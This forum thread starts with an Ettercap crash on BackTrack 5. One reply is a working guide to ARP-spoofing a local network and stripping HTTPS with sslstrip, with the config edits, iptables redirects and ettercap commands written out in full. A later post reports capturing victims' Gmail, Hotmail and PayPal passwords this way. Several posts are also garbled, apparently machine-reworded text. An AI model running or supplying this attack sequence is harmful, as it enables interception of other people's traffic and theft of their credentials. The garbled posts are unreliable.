Results 1 to 6 of 6

Thread: Backtrack 5- while scanning for active host, ettercap crashes

  1. #1
    Join Date
    May 2011
    Posts
    450

    Backtrack 5- while scanning for active host, ettercap crashes

    I now updated from backtrack 5 releases 2 to backtrack 5 gnome 64 on my Toshiba Satellite P305-S8823. The whole thing is operational, airmon-ng, wireshark, and Adobe Flash, Firefox and synaptic, all fully operational. But when I start Ettercap-gtk, unified sniffing, looking for hosts -> and the graphical user interface ettercap crashes, I've left it running for several minutes waiting to resolve itself, but no luck. I have not even released yet etter.conf Does anyone else have this difficulty?

  2. #2
    Join Date
    Apr 2010
    Posts
    124

    Re: Backtrack 5- while scanning for active host, ettercap crashes

    Try following commands in your console .to fix this issue
    Code:
    sudo apt-get remove --purge ettercap-gtk
    sudo apt-get remove --purge ettercap-common
    sudo apt-get install ettercap-gtk

  3. #3
    Join Date
    Apr 2010
    Posts
    173

    Re: Backtrack 5- while scanning for active host, ettercap crashes

    Must be configured to use the side ettercap command and report here is a little guide I wrote for help.
    Code:
    nano /etc/etter.conf
    hold shift + press w then t
    enter line 17 and you will see these lines you must change to 0
    ec_uid = 65534 # nobody is the default
    ec_gid = 65534 # nobody is the default
    to this
    ec_uid = 0 # nobody is the default
    ec_gid = 0 # nobody is the default
    hold shift + press w then t
    type 1 then
    hold shift + press w then t
    type 168 and change the following lines
    #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    to this
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    press ctrl+x and y to save
    Time to start ettercap and sslstrip
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    start ettercap
    Code:
    ettercap -T -q -M ARP // // -i (interface)
    Try using a chosen host or hosts
    Code:
    ettercap -T -q -M ARP /gateway/ /target/
    Obtain Gateway
    Code:
    netstat -nr
    Now start to strip sslstrip https (Hypertext Transfer Protocol Secure) back to http ((Hypertext Transfer Protocol).open a new terminal
    Code:
    sslstrip -l 1000 -w capture.txt
    you can also use sslstrip with options
    Code:
    sslstrip -k -f -l 10000 -w capture

  4. #4
    Join Date
    Apr 2010
    Posts
    234

    Re: Backtrack 5- while scanning for active host, ettercap crashes

    Unfortunately. Ettercap-gtk does not work (inside my Satellite P305-S8823). I tried to boot commencing from the DVD to authenticate with the intention of at hand; it was a blunder I finished. Still rejection joy. I tried consecutively the identical disk on a different laptop (Satellite L645): Ettercap-gtk working fine! Conclusion –It has a hardware configuration difficulty. Almost certainly necessitate to set-up dissimilar drivers.

  5. #5
    Join Date
    May 2008
    Posts
    2,680

    Re: Backtrack 5- while scanning for active host, ettercap crashes

    This is the primary occasion I installed Ettercap mint debian gnome 64 on my Linux partition. Using ettercap-G, would shut subsequent to scanning of hosts 9 out of 11 times I tried, following May gnome 64 installed Backtrack, still I have the indistinguishable difficulty. I believe there is a difficulty with Ettercap and 64-bit architecture or ettercap and gnome. I will become accomplished at to create use of the terminal in place, the graphical user interface that looked like a nice bonus.

  6. #6
    Join Date
    Nov 2009
    Posts
    865

    Re: Backtrack 5- while scanning for active host, ettercap crashes

    In my pc it works! I find the username and password Ettercap after sniffing. Repeat only the problem that is "unsafe website" to me "victimxp," but if the victim does not accept insurance website come in passwords. I tried gmail, hotmail, paypal, Alice. If I'm not changing ec_uid and ec_gid (default etter.conf!) I do not know what to say!) Above information help me lot .I’m thankful to all above member.

Similar Threads

  1. crashes with VMPlayer 3.0.0 causing X on host.
    By Swiz in forum Operating Systems
    Replies: 4
    Last Post: 12-09-2011, 01:22 PM
  2. Ettercap and sslstrip in backtrack 5
    By GaganGang in forum Operating Systems
    Replies: 4
    Last Post: 18-06-2011, 02:44 AM
  3. Backtrack 4 on sun Virtual box Vista host usb adapter fail
    By Kaalicharan in forum Operating Systems
    Replies: 6
    Last Post: 10-05-2010, 10:00 AM
  4. Replies: 5
    Last Post: 15-02-2010, 01:07 PM
  5. Active Directory could not resolve DNS host name
    By shivendra in forum Active Directory
    Replies: 4
    Last Post: 12-07-2007, 02:40 PM

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
Page generated in 1,713,567,304.17035 seconds with 17 queries